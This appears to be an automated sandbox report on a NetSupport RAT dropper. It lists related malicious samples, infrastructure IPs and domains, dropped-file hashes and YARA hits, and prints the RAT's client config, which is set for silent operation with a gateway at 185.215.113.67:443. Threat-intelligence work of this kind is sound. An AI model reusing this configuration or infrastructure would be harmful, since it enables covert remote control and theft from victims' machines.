                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    185.215.113.67oMHveSc3hh.exeGet hashmaliciousAmadey RaccoonBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    0KuDEDABFO.exeGet hashmaliciousAmadey RaccoonBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    miOnrvnXK0.exeGet hashmaliciousAmadey RaccoonBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    Rh74sODsWE.exeGet hashmaliciousAmadey RaccoonBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    dSQUdo6EjO.exeGet hashmaliciousAmadey RaccoonBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    usVhwck8lN.exeGet hashmaliciousAmadey RaccoonBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    SecuriteInfo.com.W32.AIDetect.malware1.20102.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    MR98F1zzeo.exeGet hashmaliciousAmadey Raccoon VidarBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    8f5718a6042061b23a4e42ee5cd8112946c135dc9d0c2.exeGet hashmaliciousAmadeyBrowse
                                                                    • 185.215.113.67/4dcYcWsw3/index.php
                                                                    fC4T1vVs24.exeGet hashmaliciousAmadeyBrowse
                                                                    • umbrelladownload.uno/gp6GbqVce/index.php
                                                                    104.26.0.231qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    q8m0iSxPqZ.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    geo.netsupportsoftware.comhttp://holidaybunch.comGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.1.231
                                                                    NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.1.231
                                                                    NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.1.231
                                                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.1.231
                                                                    update.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.1.231
                                                                    qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 172.67.68.212
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 185.215.113.37
                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                    • 185.215.113.37
                                                                    CLOUDFLARENETUShttps://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                    • 104.18.1.150
                                                                    https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://caraccidentdefencelawyer.com/LBKQgs7C#3l3f816z5y810bbd3w5muypm6py7liz04w39Get hashmaliciousGRQ ScamBrowse
                                                                    • 172.67.12.83
                                                                    https://forlongreasoncomingbad.top/comcast/bdon/?911comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.21.12.201
                                                                    https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                    • 104.18.86.42
                                                                    [EXT] [ #ENCRYPT ] WSRB 401k, Trustee to Trustee Transfer form.emlGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    https://coinbase-team.net-s07.live/Zendesk/invite/ca2fd752-4355?rid=Ztd9NzCGet hashmaliciousUnknownBrowse
                                                                    • 188.114.96.3
                                                                    https://atpscan.global.hornetsecurity.com/?d=NnVkJrcOtS6jUcSOl6gFYT9DOTvhRx9_0n2vBuK3wGL4RfM1M4gwz-cei5V3Dmlh&f=VRGvOaKnOixCQPnN5E8Zd55sAVwpSzujOffY4RbLuwaxI18GkkIlhnlDIOqXjYsl&i=&k=IMq7&m=Eg31PQDiRU2Qx94y2dnGUum54tAMBzZzPaQN8QexaGJVzCG-OVPo4Om5V2lRlns7wwMWrL4CnmlsokgWfWk2TbD2kmpRAVDDTYG9PjUhZhfW-BwkapmD9W6_zQVWXFVN&n=KNtSaiODbNsJQEbSEZDwh34xn1itEQQfP1UznpoGI5WaWwC1dWtBevnqXGm5H-f7&r=2Ow9cKZ98a-5wptqW8Y-zAwN-MJuNt25fcQbqzqwDypDZl3_sT7dioYpzt-h-3hX&s=1f78a40d69089fa0743a8630bc133d18afc652a160161afdf52202844b072b54&u=https%3A%2F%2Ft.ly%2Fe_R6vGet hashmaliciousUnknownBrowse
                                                                    • 104.20.7.133
                                                                    19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                    • 188.114.96.3
                                                                    Bank transfer receipt 241015.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\Public\Pictures\HTCTL32.DLLhttp://holidaybunch.comGet hashmaliciousNetSupport RATBrowse
                                                                      upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                                                        information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                          Update_2762895.msixGet hashmaliciousNetSupport RATBrowse
                                                                            Update_9025289.msixGet hashmaliciousNetSupport RATBrowse
                                                                              JbZaDxFXF3.exeGet hashmaliciousNetSupport RATBrowse
                                                                                Update_6529495.msixGet hashmaliciousNetSupport RATBrowse
                                                                                  Update_7053228.msixGet hashmaliciousNetSupport RATBrowse
                                                                                    Update_5289856.msixGet hashmaliciousNetSupport RATBrowse
                                                                                      file.exeGet hashmaliciousNetSupport RAT, LummaC Stealer, NetSupport DownloaderBrowse
                                                                                        C:\Users\Public\Pictures\PCICHEK.DLLhttp://holidaybunch.comGet hashmaliciousNetSupport RATBrowse
                                                                                          upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                                                                            information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                                              Update_2762895.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                Update_9025289.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                  JbZaDxFXF3.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    Update_6529495.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                      Update_7053228.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                        Update_5289856.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                          file.exeGet hashmaliciousNetSupport RAT, LummaC Stealer, NetSupport DownloaderBrowse
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):328056
                                                                                                            Entropy (8bit):6.754723001562745
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                            MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                            SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                            SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                            SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Pictures\HTCTL32.DLL, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                            • Filename: upd_8707558.msix, Detection: malicious, Browse
                                                                                                            • Filename: information_package.exe, Detection: malicious, Browse
                                                                                                            • Filename: Update_2762895.msix, Detection: malicious, Browse
                                                                                                            • Filename: Update_9025289.msix, Detection: malicious, Browse
                                                                                                            • Filename: JbZaDxFXF3.exe, Detection: malicious, Browse
                                                                                                            • Filename: Update_6529495.msix, Detection: malicious, Browse
                                                                                                            • Filename: Update_7053228.msix, Detection: malicious, Browse
                                                                                                            • Filename: Update_5289856.msix, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):257
                                                                                                            Entropy (8bit):5.119720931145611
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                                            MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                                            SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                                            SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                                            SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):18808
                                                                                                            Entropy (8bit):6.22028391196942
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                            MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                            SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                            SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                            SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Pictures\PCICHEK.DLL, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                            • Filename: upd_8707558.msix, Detection: malicious, Browse
                                                                                                            • Filename: information_package.exe, Detection: malicious, Browse
                                                                                                            • Filename: Update_2762895.msix, Detection: malicious, Browse
                                                                                                            • Filename: Update_9025289.msix, Detection: malicious, Browse
                                                                                                            • Filename: JbZaDxFXF3.exe, Detection: malicious, Browse
                                                                                                            • Filename: Update_6529495.msix, Detection: malicious, Browse
                                                                                                            • Filename: Update_7053228.msix, Detection: malicious, Browse
                                                                                                            • Filename: Update_5289856.msix, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3735416
                                                                                                            Entropy (8bit):6.525042992590476
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                                            MD5:00587238D16012152C2E951A087F2CC9
                                                                                                            SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                                            SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                                            SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Pictures\PCICL32.DLL, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Pictures\PCICL32.DLL, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):396664
                                                                                                            Entropy (8bit):6.809064783360712
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                            MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                            SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                            SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                            SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Pictures\TCCTL32.DLL, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):105848
                                                                                                            Entropy (8bit):4.68250265552195
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                                            MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                            SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                                            SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                                            SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Pictures\bild.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):702
                                                                                                            Entropy (8bit):5.533600243545568
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Yrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSu3vbIAlkz6:cqzEmPZly6YBlLoG1fXXfDievbIAaz6
                                                                                                            MD5:4D273ADEC8E85615509D57EF7DA5A6DA
                                                                                                            SHA1:601CA5C56475C09DAA007DC843E3042B504C1096
                                                                                                            SHA-256:7780AC164E450F9E87D7BC3F80DFBE4BFF742D347FAA69C86FAF3161699E2C6C
                                                                                                            SHA-512:6AAD722A9B0E8F02970BF05FEFDE7387973CFADD4BBFC8A09B8F342F621317810A7480AAF85A15F511E333B61599C79B1D3B4EAB13907CBE968A0416681AD9BC
                                                                                                            Malicious:false
                                                                                                            Preview:0x58091b6b....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=185.215.113.67:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):773968
                                                                                                            Entropy (8bit):6.901559811406837
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:Windows setup INFormation
                                                                                                            Category:dropped
                                                                                                            Size (bytes):328
                                                                                                            Entropy (8bit):4.93007757242403
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                            MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                            Malicious:false
                                                                                                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):33144
                                                                                                            Entropy (8bit):6.737780491933496
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                            MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                            SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                            SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                            SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Pictures\pcicapi.dll, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):77224
                                                                                                            Entropy (8bit):6.793971095882093
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                                            MD5:325B65F171513086438952A152A747C4
                                                                                                            SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                                            SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                                            SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\Public\Pictures\bild.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):15
                                                                                                            Entropy (8bit):2.7329145639793984
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:QJgTG:QkG
                                                                                                            MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                            SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                            SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
